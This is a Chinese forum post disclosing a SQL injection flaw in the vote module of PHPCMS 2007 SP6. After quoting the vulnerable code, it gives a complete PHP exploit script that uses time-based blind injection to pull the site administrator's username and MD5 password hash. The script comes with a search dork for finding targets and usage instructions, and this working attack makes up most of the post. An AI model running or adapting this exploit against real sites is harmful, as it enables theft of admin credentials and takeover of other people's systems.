PHPCMS2007 SP6 vote模块SQL注射漏洞 's

作者：Ryat
来源：狼族论坛

好久没在论坛发什么东西了，今天中秋满月，发个小漏洞:)

漏洞代码：

vote/vote.php  // 22行 $optionids = is_array($op) ? implode(',',$op) : $op; ... $db->query("UPDATE ".TABLE_VOTE_OPTION." SET number = number+1 WHERE optionid IN ($optionids) ");

漏洞很明显，没什么好说的，其他地方也有类似的问题，有兴趣的同学可以跟下，下面给个poc性质的exp[由于是盲注，效果不是很好]:p
代码:

#!/usr/bin/php <?php  print_r(' +---------------------------------------------------------------------------+ Phpcms 2007 SP6 Bind SQL injection / admin credentials disclosure exploit by puret_t mail: puretot at gmail dot com team: http://www.wolvez.org dork: "Powered by Phpcms 2007" +---------------------------------------------------------------------------+ '); /** * works regardless of php.ini settings */ if ($argc < 3) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path host:      target server (ip/hostname) path:      path to phpcms Example: php '.$argv[0].' localhost /phpcms/ +---------------------------------------------------------------------------+ '); exit; }  error_reporting(7); ini_set('max_execution_time', 0);  $host = $argv[1]; $path = $argv[2];  $benchmark = 100000000; $timeout = 10;  $cmd = 'voteid=999999&attribute=1&op=999999)/**/AND/**/ryat%23'; $resp = send(); preg_match('/([a-z0-9]+)_vote_option/', $resp, $pre);  if ($pre) { echo "Plz Waiting.../n"; /** * get admin password */ $j = 1; $pass = '';  $hash[0] = 0; //null $hash = array_merge($hash, range(48, 57)); //numbers $hash = array_merge($hash, range(97, 102)); //a-f letters  while (strlen($pass) < 32) { for ($i = 0; $i <= 255; $i ++) { if (in_array($i, $hash)) { $cmd = 'voteid=999999&attribute=1&op=999999)/**/AND/**/(IF((ASCII(SUBSTRING((SELECT/**/password/**/FROM/**/'.$pre[1].'_member/**/WHERE/**/groupid=1/**/LIMIT/**/1),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23'; send(); usleep(2000000); $starttime = time(); send(); $endtime = time(); $difftime = $endtime - $starttime; if ($difftime > $timeout) { $pass .= chr($i); echo chr($i); break; } } if ($i == 255) exit("/nExploit Failed!/n"); } $j ++; } echo "/t"; /** * get admin username */ $j = 1; $user = '';  while (strstr($user, chr(0)) === false) { for ($i = 0; i <= 255; $i ++) { $cmd = 'voteid=999999&attribute=1&op=999999)/**/AND/**/(IF((ASCII(SUBSTRING((SELECT/**/username/**/FROM/**/'.$pre[1].'_member/**/WHERE/**/groupid=1/**/LIMIT/**/1),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23'; send(); usleep(2000000); $starttime = time(); send(); $endtime = time(); $difftime = $endtime - $starttime; if ($difftime > $timeout) { $user .= chr($i); echo chr($i); break; } if ($i == 255) exit("/nExploit Failed!/n"); } $j ++; }  exit("Expoilt Success!/nadmin:/t$user/nPassword(md5):/t$pass/n"); } else exit("Exploit Failed!/n");  function send() { global $host, $path, $cmd;  $message = "POST ".$path."vote/vote.php  HTTP/1.1/r/n"; $message .= "Accept: */*/r/n"; $message .= "Accept-Language: zh-cn/r/n"; $message .= "Content-Type: application/x-www-form-urlencoded/r/n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)/r/n"; $message .= "CLIENT-IP: ".time()."/r/n"; $message .= "Host: $host/r/n"; $message .= "Content-Length: ".strlen($cmd)."/r/n"; $message .= "Connection: Close/r/n/r/n"; $message .= $cmd;  $fp = fsockopen($host, 80); fputs($fp, $message);  $resp = '';  while ($fp && !feof($fp)) $resp .= fread($fp, 1024);  return $resp; }  ?>